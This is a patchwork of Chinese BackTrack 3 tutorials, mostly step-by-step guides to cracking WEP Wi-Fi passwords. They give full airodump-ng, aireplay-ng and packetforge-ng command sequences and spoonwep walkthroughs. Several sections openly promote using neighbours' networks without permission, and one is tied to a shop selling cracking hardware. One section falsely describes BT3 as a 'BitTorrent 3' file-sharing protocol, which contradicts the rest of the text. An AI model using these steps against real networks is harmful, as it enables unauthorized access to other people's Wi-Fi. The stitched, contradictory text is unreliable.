BT3简易教程
VM虚拟机启动BT3简单教程_图文.
VM 启动 BT3简单教程下载 VM6.0绿色版,点击“绿化.bat ” , 打开以下窗口
选 Y 继续,安装 1—8。
不要管这些警告,点击仍然继续,安装好退出。
点击 sou..exe, 运行 VM 虚拟机,选取“起始页”
点“新建虚拟机” , 选 linux(其实选哪一个都可以,因为我这个是镜像启动 BT#,而不是在 VM 里安装 BT3 点下一步
设置虚拟机名称和文件位置,不熟练可以不用设置,直接点下一步
这里设置硬盘大小,多少都可以,我一般选最小 1G ,点完成,一个全新的虚拟机就建好了。
在窗口点击 CD_ROM,选上“打开电源时连接” ,选取“使用 ISO 镜像”点击“浏览” ,找到你放在硬盘的 BT3光盘版。
(注意,光盘版应该是 ISO 格式,不是 RAR 格式 ,确定。
点击“启动该虚拟机”开启虚拟机电源,进入启动介面。
可能有的电脑会跳出一些警告和提示,不要理它,点是和否都可以,继续。
出现这个介面时选第一项,稍等一会,就可以进入 BT3了。
点击虚拟机菜单栏的“虚拟机 -可移动设备 -USB 设备”把你的 USB 网卡选上。
我这里是 Realtek USB设备。
bt3教程
BT3教程什么是BT3?BT3是一种基于分布式网络的文件共享协议,它允许用户通过互联网共享和下载文件。
BT3的全称是BitTorrent3,它是BitTorrent协议的第三个版本。
与传统的中心化文件下载方式不同,BT3使用了分布式网络和点对点传输的方式,可以实现高效、快速的文件共享。
如何使用BT3进行文件下载?要使用BT3进行文件下载,你需要以下几个步骤:步骤1:安装BT3客户端首先,你需要从BT3的官方网站或其他可信的下载源下载和安装BT3客户端软件。
常见的BT3客户端软件有μTorrent、BitComet等。
安装完成后,打开BT3客户端。
步骤2:搜索和选择下载文件在BT3客户端中,你可以通过内置的搜索功能或手动输入磁力链接来搜索要下载的文件。
磁力链接是一种唯一标识文件的字符串,你可以从各种资源网站上获得。
找到你想要下载的文件后,选择它并点击下载按钮。
BT3客户端会开始连接到下载源并开始下载文件。
步骤3:等待下载完成一旦下载开始,你可以在BT3客户端中看到下载进度和剩余时间。
等待下载完成后,你就可以在本地文件夹中找到下载好的文件。
BT3的优势和特点相比传统的文件下载方式,BT3具有以下几个优势和特点:1. 分布式网络BT3使用了分布式网络的方式,文件可以从多个下载源同时下载,提高了下载速度和稳定性。
即使某个下载源不可用或速度较慢,也可以通过其他下载源继续下载。
2. 点对点传输BT3采用了点对点传输的方式,文件可以同时从多个用户的计算机上下载,减轻了单个下载源的负担,提高了下载效率。
同时,用户也可以将自己的计算机作为下载源分享给其他用户。
3. 断点续传BT3支持断点续传,即使在中断或暂停下载后,也可以从上次下载的位置继续下载,而无需重新下载整个文件。
这对于大文件的下载非常有用,可以节省时间和带宽。
4. 私密性和匿名性BT3通过加密和匿名化技术保护用户的隐私和安全。
用户的下载活动不会被轻易追踪和监控,提供了更高的隐私保护。
BT3使用教程
BT3使用教程BT3(BackTrack 3)是一款以Debian为基础的Linux操作系统,专门用于网络安全评估。
它内置了许多用于渗透测试和漏洞利用的工具,因此成为众多安全专业人员和黑客的首选系统之一本文将为您提供BT3虚拟机版的使用教程,让您了解如何安装和使用BT3来进行网络安全评估。
2.安装虚拟机软件BT3是一个虚拟机镜像,因此您需要一个虚拟机软件来运行它。
您可以选择VMware Workstation、Oracle VM VirtualBox等软件来安装BT3的虚拟机。
3.创建BT3虚拟机打开您选择的虚拟机软件,并创建一个新的虚拟机。
在创建过程中,选择导入已有的BT3镜像文件作为虚拟机的操作系统。
指定RAM、硬盘空间和网络设置等参数,并完成虚拟机的创建。
4.启动BT3虚拟机现在,您可以启动BT3虚拟机了。
在虚拟机软件中,选择启动已创建的BT3虚拟机,等待一段时间,系统将自动启动。
5.登录BT3系统当BT3系统启动后,您将看到一个登录界面。
默认的用户名是"root",密码是"toor",输入正确的用户名和密码,然后按Enter键登录系统。
6.更新系统一旦登录成功,打开终端,并使用以下命令更新系统:```apt-get updateapt-get upgrade```7.使用BT3工具BT3内置了许多有用的安全工具,您可以使用它们来进行渗透测试和漏洞利用。
以下是一些常用的BT3工具:- Nmap:用于网络扫描和探测。
- Metasploit:用于漏洞利用和渗透测试。
- Wireshark:用于网络分析和数据包捕获。
- Aircrack-ng:用于无线网络渗透测试和密码破解。
- John the Ripper:用于密码破解。
- Hydra:用于密码爆破。
8.学习BT3工具的使用9.实践操练一旦您熟悉了BT3的工具和使用方法,可以尝试在合法的环境中进行实践操练。
bt3虚拟机安装使用图文教程
虚拟机破解WEP详细教程 一. 虚拟机安装篇1、双击虚拟机驱动图标几分钟后出现如下图:2、点击出现如下图:3、选择默认的典型安装点击出现如下图:4、选择默认安装路径点击出现如下图:5、默认选择后点击出现如下图:6、点击进行安装,稍后出现如下图:7、双击出现如下图:8、复制Serial 栏中的序编号填写如下图:9、点击进行注册。
10、点击完成安装后出现如下图:11.点击后完成虚拟机驱动安装。
12、虚拟机汉化程序驱动安装点击出现如下图:13、点击 下一步 选择我同意“许可协议”中的条款后再点击两次 下一步 选择默认安装路径后出现如下图:14、点击 下一步 再点 是 后取消推荐使用的第三方插件的三个选项再次点击 下一步 完成汉化安装。
二 、虚拟机设置篇1、新建虚拟机后点击下一步2、选择典型安装点:: 3、选择LINUX,注意版本选择 other linux 2.6.x kernel!4、按是提示虚拟主机名字和要安装的位置(自定)5、选择使用网络地址翻译点下一步完成。
6、双击选择使用ISO镜像 浏览找到 BT3.ISO文件点击打开后确定。
7、点击绿色按钮启动虚拟机出现如下图:8、这里我们点启动虚拟机中的BT3.ISO文件。
三、 虚拟机破解篇完成以上的步骤后就开始破解啦1、启动BT3后,会出现一个界面。
会有很多的选择。
我们选择默认的第一个。
到最后,大约等待1分钟,看您电脑配置。
如果不能默认进入系统提示输入账户密码, 在此我们输入如下:root 回车toor 回车xconf 回车startx 回车当然如果是默认进入系统就更好了。
如果不是默认就要输入上边的命令,如果正常进入上边的步骤可以跳过!注意一定要做!启动建好的虚拟机,加载网卡,“虚拟机-可移动设备-USB 设备-Realtak可移动设备”如下图(如果破解时无法抓包那一定是漏了这步)注意一定要做,启动BT3时就要做了接着就是正式破解了,打开一个shell输入命令2、打开shell,输入命令 spoonwep(纯字母无数字)然后回车。
BT3完整安装到虚拟机
BT3完整安装到虚拟机在参考了无数的文字说明,终于得出了一个好用的方法。
论坛里有个几个是写了这方面的文章,但是照着帖子仍未能安装成功。
我照着他们的说明就是安装不成功。
但有说到简单安装的方式,就是用partitionmagic分区工具。
对linux 的陌生,所以用图形化的工具更适合新手。
vmwart5.5 配置情况:硬盘我还是推荐选SCSI的,这样就不必再去更改启动文件,另外这个启动文件我也不懂,不打算修改了。
我只要求bt3能完整安装上这个虚拟机。
加载集成partitionmagic 硬盘分区软件的启动光盘镜像文件-------选择程序PM8.05繁体中文分区工具分区分区的格式和种类如下图,分区完成后记得再格式化下主要分区(格式为Linux Ext3)随后保存重启完成硬盘的分区工作更换虚拟机的镜像文件加载bt3镜像—启动完成打开shell 输入fdisk –l 查看分区情况在kde菜单里面的Backtrack下找Install Backtrack(Not Tested)Source(Backtrack CD)、Install Backtrack to、Write New MBR(lilo mbr to)默认即可,不用改动选Real,去掉Restore Original MBR after lilo前的叉点install 安装等进度到100% 出现“All done! click Close button”,按Close按钮即可重启虚拟机即可我是在尝试了n次的失败后总结一个经验虚拟机的硬盘要选择SCSI,如果用bt3光盘进入系统后用cfdisk 命令如果看不到硬盘,那就删掉这个虚拟机,重新建一个。
一般第二次新建的就可以找到硬盘了。
其他的都很简单关键就是这个分区和硬盘的种类的选择上,让我们在用vmware 安装bt3的时候无法成功。
解决这两个问题虚拟机就包你能正常启动了。
BT3简易教程
BT3 破解无线WEP/WPA 教程声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。
本教程用于学习和交流,如要实验请拿自已的AP 开刀!本教程非本人原 创,是采用了网上各位兄弟的大作编辑而成.如有版权问题请联系本人.中国无线论坛:无线装备论坛本人是各无线论坛ID水草,淘宝ID:水草GG,此教程只是将部分内容简易化,易于新 手操作,如有不正确的地方请指出.欢迎各位到论坛提问咨询. 推荐论坛:中国无线论坛 无线装备论坛 如果需要购买破解装备可以到我的淘宝店看看 此教程主要是作为赠品送给各位淘宝买家的. 推荐下载无线论坛()中卫的教程.1-1.下载BT3 FINAL版,光盘版下载地址 刻盘或者做硬盘虚拟机启动,就不详细说明了.虚拟机要启用USB设备,对于新手开始不推荐使用.BackTrack 3 Final 光盘版 Name:: bt3-final.iso Size: 695 MB Download: .uoc.gr/mirrors/linux/backtrack/bt3-final.iso MD5: f79cbfbcd25147df32f5f6dfa287c2d9 SHA1: 471f0e41931366517ea8bffe910fb09a815e42c71-2.启动有可能要求输入用户名和密码. 用户名:root 密码:toor ,进入图形界面:startx 。
有的电脑启动BT3 后黑屏:xconf 再输入startx 有的电脑实在不能进入桌面窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开一个 shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。
关闭窗口用PRINT SCREEN 键.ifconfig –a 记住自己网卡的MAC,不同的网卡不同的电脑接口可能不一样.WLG-1500SMA和760N一般为eth?,这里的?是数字. 下面图片里或者文章命令里的wifi0,rausb0,eth1等是各种网卡接口,要换成换成自己的.1-3.查看网卡接口,输入:无线装备论坛官方店: 中国无线论坛:无线装备论坛1-4.加载网卡 输入命令: Ifconfig –a eth11-5.查找目标: 当然也可以在WINDOWS下用软件搜索要破解的AP,这样可以省略这步. 输入命令: airodump-ng eth1通过扫描获得你要破解的AP 的MAC 和SSID 还有是否有客户端等信息。
BT3破解无线路由密码过程详解
BT3破解无线路由密码过程详解(第一篇:硬盘版)2009-11-01 17:122009-08-30 19:52现在用无线路由的很多,小区里随便搜索一下就能好几个无线信号,不过大部分都是加密的,本教程的目的是破解这些加密的信号,前提必须是用wep加密的,其实绝大多数都是wep加密的。
由于wap(非wep)加密的破解起来比较困难,成功率很低,故在此暂不讨论。
而wep加密的只要你的无线网卡能够被bt3支持,那么基本上10分钟左右(甚至更快)就能破解一个。
这篇帖子是以装在硬盘上为例进行介绍的====基本思路=====在Windows系统中安装BT3(linux)到D盘;重启后从双启动菜单选择进入BT3操作系统;在BT3中运行Spoonwep这个程序破解无限AP的密码。
====基本条件=====1.笔记本或台式机(必须有wifi网卡,而且必须能被bt3支持);注:目前701/900/900HA等机型的无线网卡均支持BT3破解,这几款的无线网卡型号好像是Athero 5007EG。
901和1000H好像目前都不支持破解,因为之前我从网上找到了1000H的无线网卡在bt3中的驱动模块,能成功驱动起来,但只支持监听,不支持注入,所以无法破解到密码。
2.能够在你的周围搜索到无线信号,而且是用wep加密的(本文只讨论wep加密的破解,至于wap加密的暂不讨论);3.如果无线路由有客户端,也就是有人在用这个路由的信号上网,那么破解起来要快一些;如果没有客户端的话,也可以破解,不过要慢一些。
====软件准备=====软件准备:本文用EeePC900HA(无线网卡:Athero 5007EG)为例做说明,采用硬盘安装bt3的方式(安装到D盘)(U盘安装BT3的方法参见:/redirect.php?tid=16670)。
1. BT3(BT3是linux的一种,好比REDLINUX,好比红旗LINUX。
不过这个BT3集成了大量的黑客工具,尤以破无线网的工具而出名。
BT3教程,如何正确使用BT3,
新建虚拟机完成之后我们就可以直接启动虚拟机进入BT3系统.
等待几分钟后将自动进入系统界面,启动成功...
将台湾Wifly-ctiy 11N 1000MW超级无线网卡接上,再插上USB线连接上电脑,这里虚拟机将会自动检测出11N连接到虚拟机,单击OK即可.
选择菜单VM => Removable Devices => Ralink USB Device =>Connect
(from Host) , 这里是将台湾Wifly-ctiy 11N 1000MW超级无线网卡装载到虚拟机里面.
下面我们将开始使用启动spoonwep程序开始破解WEP加密的无线网络.
单击右下角小图标启动命令终端.
启动成功后,你将看到一个命令行的窗口,
第一步: 输入ifconfig –a 查看台湾Wifly-ctiy 11N 1000MW超级无线网卡端口. 第二步:输入spoonwep 启动spoonwep2破解程序.
最后你如果看到你红色的WEP KEY部份,这个就是无线风络加密的密码, 剩下的步骤相信大家都知道拉,打开自己手机的wifi管理部份,找到这个无线网络,再把这个密码输入就可以
免费用手机和电脑共享使用人家的无线网络, 注意: 中间那个: 号是要去掉的.。
利用BT3破解WEP简明教程【多图】 2010-02-10 (BT4)
利用BT3破解WEP简明教程【多图】2010-02-10 (BT4)2009年10月22日于 2:15 上午ZephyrXT抢板凳文中所用到的mac地址均处理过所用软件为BT3,官网地址:/backtrack_download.html软件下载地址:/downloads/ (最新版本已更新到BT4 Final 且提供WM镜像下载,省去安装烦恼. BT4破解方法与BT3相同——也可参考本文评论部分;如今无线路由WPA2加密业已流行,所以破解的机会并不那么大.仅供技术参考而已)(2010-04-07:考虑到手动破解十分复杂;已上传《无线网络密码破解傻瓜图文》(下载)——毫无疑问,此方法相对方便得多)虚拟机为VMware,多特华军都有,可自行搜索。
虚拟机推荐用vmware,virtualbox 不支持部分网卡。
另附一款无线信号搜索工具,inSSIDer,可去此处下载,或者此处第一步,用inSSIDer搜索你要破解的无线路由,记住SSID,也就是无线网络的名字,mac地址和信道号第二步,打开设置好的虚拟机,并启动虚拟机的系统(这一步怎么用就不说了),另外,如果不用虚拟机系统,把下载的bt3镜像刻成光盘或考到U盘中启动电脑也是十分好用的。
推荐用u盘,光盘启动比较慢。
下图为启动好的BT3界面,点击红框内的图标启动命令行输入ifconfig -a来查看电脑上所有网卡的信息,eth为有线网卡,L0为未识别的网卡,wlan0为已识别的无线网卡,若采用的是usb无线网卡这个名称还可能是rausb,反正出现什么名字记住就是了,后面要用到的,还可以输入iwconfig只查看无线的网卡。
如下图现在输入ifconfig -a wlan0 up, 意思是在linux系统中将可用的无线网卡激活,如图现在要用到从inssider中得到的信息了,输入airmon-ng start wlan0 6, 这里6是信道号,开始用wlan0监听6频道上的所有网络,如图:并显示了你网卡的芯片型号:rtl8187(监听模式开启)然后开始抓包了,输入airodump-ng –ivs -w 123 -c 6 wlan0, ivs是数据包的格式,123是临时文件的名称,wlan0是所用网络,6为信道号,如图:BSSID是搜到的无线路由的mac;pwr是信号强度,越高越好啦;data是有无客户端,不为零的优先选择;ch是信道;en是加密方式,选择wep的,这里我们拿第一个开刀,本人是有道德的,只是学习,绝不破坏!!!!!!!了解了以上的信息后,在开一个命令行窗口输入aireplay-ng -1 0 -e 路由的名字 -a 路由的mac -h 自己用来破解的无线网卡的mac wlan0 回车,配合下图更好理解:执行上面命令后显示:上图说明我们的无线网卡和路由挂接成功,接下来就要破接啦!!!!!!!!!再开一个命令行,输入aireplay-ng -5 -b 路由mac -h 本地无线网卡mac wlan0,回车后:“使用这个数据包吗?”输入y回车如下图:记住这个xor文件的文件名,后面会用到接着输入packetforge-ng -0( 这个是零不是英文字母o) -a 路由的mac -h 无线网卡的mac -k 255.255.255.255 -l(这个事小些的L) 255.255.255.255 -y *.xor -w myarp到此输入完成后回车,这行里的*.xor就是刚才让你记住的那个文件名,千万要仔细,这行比较长!!!!!!!!!!!!!如图:然后出现wrote to packet to : myarp 将数据写入数据包myarp接着再开一个命令行输入下图的命令:回车后显示:使用该数据包吗?输入y回车,如下图:如果成功的话会看到密码就在你眼前喽!!!!下图就是密码:把中间冒号去掉,1122334455就是密码啦,快去上网吧!!!附:如果不成功,可等到上上步的数据包再大一些再用上一行的命令破,一般每涨一万两万的就破解一回相关日志∙暂无相关日志软件BT3, BT4, WEP, 破解评论发表评论反向链接∙作者 ZephyrXT 于大约 4 个月前发表. 回复bt4 wifi 破解———————pre———————1.下载光盘版BT4.iso,copy其中的boot和bt4到U盘,windows下运行bootinst.bat安装到U盘。
BT3傻瓜教程2
准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能在电脑上读出来,建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较请您自己百度去,这里不多说了格式化完成后,此U盘为空的U盘插入到电脑USB口1.下载U盘版bt3的文件2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件:Snap1.jpg当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了我是直接加栽到虚拟光驱来用的,省空间,无需解压3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去Snap2.jpg4.点击开始-运行,输入CMD, 然后回车,进入命令行模式Snap4.jpg输入U盘的盘符,我的为I:,然后回车输入 cd boot 回车输入 bootinst.bat 回车,就会开始制作BT3setup1.JPG开始制作时,会出现这样的画面,大概意思就是,此操作将会重写U盘的MBR(即引导区),如果此分区是您的一个硬盘上的分区,那您的Windows系统将会启动不了,请小心,按X键中止操作,按其他任意键继续制作我就是在U盘上操作的,所以不用理会,按任意键就可以了setup2.JPG上面的图,是制作完成后的提示,设置引导记录成功,按任意键退出制作制作的过程很快,大概不到十秒,其他,他只是重新写了一下U盘的引导区就OK了到此为止,此U盘就可以引导系统进去bt3了1.将USB网卡插入电脑,放入附带驱动盘,安装网卡驱动程序。
安装完成后右下角会出现网络信号符号,双击然后搜索可用网络,选信号较强网络(WEP加密)记下网络名称备用。
2.把电脑设置为光驱启动,U盘版设置为USB启动,如果你不知道如何设置请参考主板说明书,或者直接百度一下,(现在很多电脑买回来默认开启光驱启动,所以你不设置说不定也可以)大家最好用虚拟机,可以解决一些显卡驱动不适于linux BT3的很多问题!还安全方便许多,虚拟机的安装我们在这里也是有讲过的!!3.放入BT3光盘(然后重启电脑),选择第三项 BT3 Graphics mode (KDE)进入linux 系统,默认是选择第一项,如果不选择会倒数3秒自动正常会进入BT3桌面1、点击屏幕左下角第二个图标(黑色)如图:开启一个窗口,输入:ifconfig -a记下卡王网卡接口名,这里显示的接口名是:wlan0,如果有多个无线网卡,卡王的接口名可能是wlan1,wlan2….如何分辨卡王的接口名,请根据卡王的后面的MAC地址,找到对应的卡王接口名.如果只有一块无线网卡,那第1 步不需要操作;直接进行如下破解操作.输入:spoonwep 回车后10秒左右弹出 spoonwep2 程序:NET CARD 网卡接口选择 WLAN0DRIVER 驱动选择 NORMALMODE 模式选择 UNKNOWN VICTIM点 NEXT 转到 VICTIMS DISCOVERY 窗口CHAN HOPPING 是全频段扫描(建议选择: FIXED CHAN,有针对性的扫描)点击右上角 LAUNCH 按钮 (点完后会变成 ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。
BT3破解无线路由密码过程详解(第二篇:U盘版)
蹭网必备:BT3破解无线路由密码过程详解(第二篇:U盘版)BT3安装在硬盘上的,操作起来比较麻烦。
今天帖子的方法是将BT3安装在U盘或者SD卡上。
不明白BT3和无线信号密码破解是怎么回事的先自己百度一下吧,在这里就不详细介绍原理了。
本帖的思路:在U盘(或者SD卡)上安装BT3系统,从U盘启动进入BT3,利用Spoonwep2来破解wep 加密的无线信号。
====要求====1. 你的无线网卡比如支持BT3破解才可以,你可以对照附件中的列表查看自己的无限网卡是否支持bt3破解:BT3支持列表:1 Wireless Cards And Drivers2 Tested Card List2.1 PCI2.1.1 Asus WL-138g v22.1.2 Belkin F5D80012.1.3 CNet CWP-8542.1.4 Dlink DWL-AG5302.1.5 Dlink DWL-G5202.1.6 Dlink DWL-G5502.1.7 Dlink DWL-G5102.1.8 Foxconn WLL-33502.1.9 MSI PC60G2.1.10 Netgear WG311T2.1.11 Netgear WPN3112.1.12 SMC SMCWPCI-G2.2 Mini PCI (Built in)2.2.1 Broadcom BCM4306 802.11b/g (rev 3)2.2.2 Broadcom BCM4318 802.11b/g2.2.3 IBM AR5212 802.11abg NIC (rev 01)2.2.4 IPW21002.2.5 IPW22002.2.6 WN360G2.3 Mini PCIe (Built in)2.3.1 Broadcom BCM4311 802.11b/g2.3.2 IPW39452.3.3 IPWRAW (IPW3945 Monitor + Inject)2.3.4 IPW4965/IWL4965 agn2.3.5 Gigabyte GN-WS50G b/g2.4 PCMCIA Cards2.4.1 3COM 3CRWE154G72 v12.4.2 3COM 3CRPAG175B with XJACK Antenna2.4.3 Agere Systems ORiNOCO GOLD PC Card Classic 2.4.4 AirLink101 AWLC41302.4.5 ASUS WL100G2.4.6 Belkin F5D6020 v32.4.7 Belkin F5D7010 V10002.4.8 Belkin F5D7010 V3000UK2.4.9 Belkin F5D7010 V50002.4.10 Belkin F5D7010 V60002.4.11 Belkin F5D70112.4.12 Buffalo WLI-CB-G54HP2.4.13 Cisco AIR-LMC3502.4.14 Cisco AIR-PCM350-T2.4.15 Cisco Aironet AIR-CB21AG-A-K92.4.16 Dlink DW A-6452.4.17 Dlink DWL-650+2.4.18 Dlink DWL-G6502.4.19 Dlink DWL-G630,650+/-2.4.20 Dlink DWL-G650M2.4.21 Dlink DWL-G650+2.4.22 D-Link WNA-13302.4.23 Enterasys Roamabout 802.11 DS High Rate2.4.24 Gigabyte GN-WM01GT AirCruiserG Mach G 2.4.25 Lucent Technologies Orinoco Silver2.4.26 Linksys WPC11v42.4.27 Linksys WPC11v42.4.28 Linksys WPC54G v32.4.29 Motorola WN825G v22.4.30 NetGear MA4012.4.31 NetGear WPN5112.4.32 NetGear WPN511 - Range Max2.4.33 NetGear WG511T2.4.34 NetGear W AG511v22.4.35 NetGear WG511 v12.4.36 NetGear WG511v22.4.37 Netgear WG511U2.4.38 NetGear WPN511GR2.4.39 Netgear WPNT5112.4.40 PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD)2.4.41 Senao NL-2511CD PLUS EXT22.4.42 Senao Sl-2511CD Plus EXT22.4.43 Senao SL-2511 CD PLUS (the one w/o external connectors)2.4.44 Sitecom WL-100b2.4.45 SMC 2532W-B2.4.46 SMC SMC2536W-AG2.4.47 SMC WCB-G2.4.48 SWEEX LW051 ver:1.02.4.49 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G) 2.4.50 TP-link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G)2.4.51 Ubiquiti SRC2.4.52 Wistron WLAN 802.11a/b/g Cardbus CB9-GP2.4.53 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)2.4.54 ZCom XI-325HP+2.4.55 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l)2.5 USB Dongles2.5.1 Airlink101 AWLL30262.5.2 ALFA Networks AWUS036H2.5.3 ALFA Networks AWUS036S2.5.4 ASUS WL-167G2.5.5 A VM Fritz!Wlan USB V1.12.5.6 Belkin F5D7050 V12.5.7 Belkin F5D7050 (4000 series)2.5.8 Belkin F5D7050B2.5.9 Belkin F5D70512.5.10 Buffalo Airstation G54 WLI-U2-KG54-AI (2A)2.5.11 Chiefmax2.5.12 D-Link DWL 122 (USB) F/W3.2.1 H/W A12.5.13 D-Link DWL G122 (USB) F/W 2.03 B12.5.14 D-Link WUA-13402.5.15 Edimax EW-7317UG2.5.16 Edimax EW-7318USG2.5.17 Linksys WUSB54g v42.5.18 Linksys WUSB54GC2.5.19 MicroEdge MEG55A Wireless-G USB Dongle2.5.20 NetGear WG111v22.5.21 NetGear WG111T2.5.22 Netopia ter/gusb-e2.5.23 OvisLink Evo-w54usb2.5.24 SafeCom SWMULZ-54002.5.25 ZyDAS 12112.5.26 SMCWUSB-G EU2.5.27 MSI US54SE2.5.28 Hawking HWUG1目前已知支持bt3破解的几款上网本有:701,900,900HA等,不支持的有:联想S10,EeePC 1000H2. 要求你要破解到无线信号为wep加密(不能是wap),这个在破解的过程中能看出来是wep加密还是wap加密的。
BT3使用图解
BT3破解盘使用说明一、光盘启动进入BT31.光盘启动的步骤:将电脑设置为光盘驱动,具体请百度一下“光盘启动”很详细。
不同的电脑具体方式不一样。
一般是:首先在系统自检的时候(重启的时候),敲下键盘上的“DEL”(注意:有些主板是F1 或F2或F10)键,进入BIOS 设置程序。
在进入BIOS设置程序的主界单之后,先选中“Advanced BIOS Features”(高级BIOS 特性设定)。
然后回车,进入“Advanced BIOS Features”设定子菜单在“Advanced BIOS Features”设置子菜单中,将光棒移动至“Boot Device Select”处,然后,敲下“回车”键,以选择用什么硬件设备来引导系统。
此时会出现“启动顺序设置“子菜单(Boot device Priority),1st/2nd/3rd”,即分别代表了第一顺序、第二顺序和第三顺序引导设备,这里的第一顺序启动设备是Floppy(软盘),第二顺序启动设备是处于IDE接口上的硬盘设备,第三顺序启动设备是CD-ROM(光盘引导)。
在这里,我们只需要“1st”,通过键盘上的“Page Down”或“Page Up”键,设置成“CD/DVD-0”(CD-ROM 或DVD-ROM)就可以了。
经过这样的设置,CD-ROM (光盘)就成了第一顺序启动设备。
完成之后,敲下键盘上的“F10”键,以Save & Exit Setup (保存并退出)的方式,退出BIOS 设置程序,就完成了BIOS中的设置。
2.插入BT3 光盘,重启电脑,电脑就会自动进入到BT3.3.BT3光盘正在安装虚拟机4.安装虚拟机完成二、进入到BT3以后的破解步骤:1、按下面的说明点击左下第二个图标2,出现一个窗口3、输入 spoonwep 回车,弹出以下窗口按上图的选择。
点击 NEXT。
注意:如果第一项中没有出现wlan0解决方法:ctrl+alt弹出鼠标指针,点击虚拟机上“VM”----RemovableDevices---realtek..----connect(点击connect后,等待10S中,网卡会自动加载到虚拟机中),然后关掉前面的窗口重复1-3的操作4、在弹出的窗口里面直接单击 LAUNCH(右上角),出现下图:5、选择DATA值不为0的并且下面出现用户个数的信号如图6、选择用户,power越大越好,如图7、弹出的界面,破解方式选择第二个 P0841 的。
BT3
(2)安装并设置虚拟机,添加BT4的光盘。
(3)启动虚拟机后,在菜单栏勾选所要使用的无线网卡。
(有些版本的BT3或4需要输入用户名“root”和密码“boor”,然后输入“flux”才能进入窗口模式。
)
(4)启动命令行窗口,查看当前的网卡设备情况(ifconfig -a)
(5)在命令行中输入(spoonwep)打开破解无线网络的软件,有三个需要选择的东东,第一个是选择所要使用的无线网卡,第二个选normal,第三个选unkonw。
然后点“lunch”按钮。
(6)此时可查看搜索到的无线网络的情况,选一个信号好的,点击“selection”,进入到下一个窗口,第二行那个地方选“0841”那个,点"lunch",等待吧~~~
若是BT3,则前4步相同(其实BT4 BT3在这里的差别主要是spoonwep软件功能的差别,BT4可直接用该软件查看能搜索到的无线信号,并可把某搜索到的SSID直接导入破解,而BT3则需要在命令行中用命令查看,然后复制粘贴SSID 的mac等信息)
(5)使用以下命令打开无线网卡,并开始搜索无线网络。
airodump-ng -w 123 <网卡ID>
(6)在命令行中输入(spoonwep)打开破解无线网络的软件,输入路由器的mac,选择网卡,选择SSID的频率,选择"0841"的那一栏,然后开始破解吧。
BT3使用教程
注:spoonwep2就是我们的破解软件,一个非常强悍的图形化破解WEP无线网络密码的工具。
二、安装篇
1、将优盘格式化,唯一要注意文件系统选为FAT32就可以了。
2、将刚才下载完成的bt3解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,一个boot 一个BT3。
注意:把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件."isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" ;重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。
第五步:也是最激动人心的一步。完成第四步后。 约过了8分钟,wep密码自然而然就出来了,呵呵,到时有你激动的。
(破解中,会抓取ivs数据包,以我经验一般在20000-30000之间可以解密了) 四、连接篇 得到了密码,我们试试看看能不能连上 重新回到windows系统,用刚才得到的密码,来连接binggo网络
第二步:点NEXT按钮后进入到具体扫描窗口,我Байду номын сангаас点右上角的LAUNCH按钮开始扫描,再按该按钮是停止扫描。
第三步:软件会自动扫描周边的无线网络,扫描过程中会自动罗列出找到的无线网络的信息,传输速度,截获的通数据包大小,使用的无线信号频端,加密类别等。
第四步:扫描了一段时间,差不多有好几个信号了。你选择一个进行破解,我选了了bingo, 用鼠标单击bingo,会出现白色阴影,然后点下面的selection ok即可。
硬盘启动BT3教程
将BT3硬盘启动文件里的grldr解压到C盘根目录。
并更改boot.ini文件既可。
1.看不到文件BOOT.INI
解决:打开C盘,打开工具。
打开文件夹选项,切换到查看选项卡,勾选显示所有文件和文件夹,并且把系统文件的勾去掉,
保存并退出.在系统盘可找到。
2、如何将c:\grldr="BT3"添加到BOOT.INI文件里.
解决:将c:\grldr="BT3"复制到BOOT.INI里,注意了,是另起一行,然后复制进去BT3硬盘版安装教程设置成此处一模一样就可以了。
点应用并确定
.
3、怎么不能修改BOOT.INI的文件
解决:打开BOOT.INI属性,去掉只读,勾选存档。
选择应用后退出,这样就可以修改了。
这样,用硬盘引导BT3就解决了.
4.下一步是如何打开BT3,在启动选项中选择back track 3
经过一段英文后,要求你输入账号和密码,首先输入root 接着toor
5.开始使用BT3命令了,现在我们要进入BT3操作系统,输入命令xconf 回车 startx 回车
文件夹,并且把隐藏受保护的操作。
BT3使用方法
破解:引导系统进入BT3的选择画面,选择后面带有KDE的BT3即可1.进入bt3桌面后,需要用到的就是命令行模式,其实也不难,注意,我们要启动bt3的命令行状态,点击下面这个图标就会启动bt3的命令行状态2.点击图标,进入命令行状态,输入命令:ifconfig –a此命令,就是列出你电脑中的网卡,如果没有列出,那说明是不支持了,如果列出了,说明支持,也不一定能抓包上图就是,输入完命令,回车后看到的信息,注意图中画蓝圈的部分那里显示的是你网卡的MAC码,我的就是16-E6结尾的,可以看到说明是支持我的网卡的,我的无线网卡是:intel 2915ABG ,BT3支持2915ABG抓包内至的网卡是以eth0, eth1,eth2.....此类的IDUSB的网卡是以rausb0, rausb1,rausb2....此类的ID下面,就要以eth1,我的内至网卡来抓包2.再打开一个命令窗口,不知道怎么打开的,请去看文章上半部分打开后,输入命令:airodump-ng -w 123 eth1然后回车注意:你自己的无线网卡的ID可能是Rausb0, 或是eth0, eth1命令格式是:airodump-ng -w 123 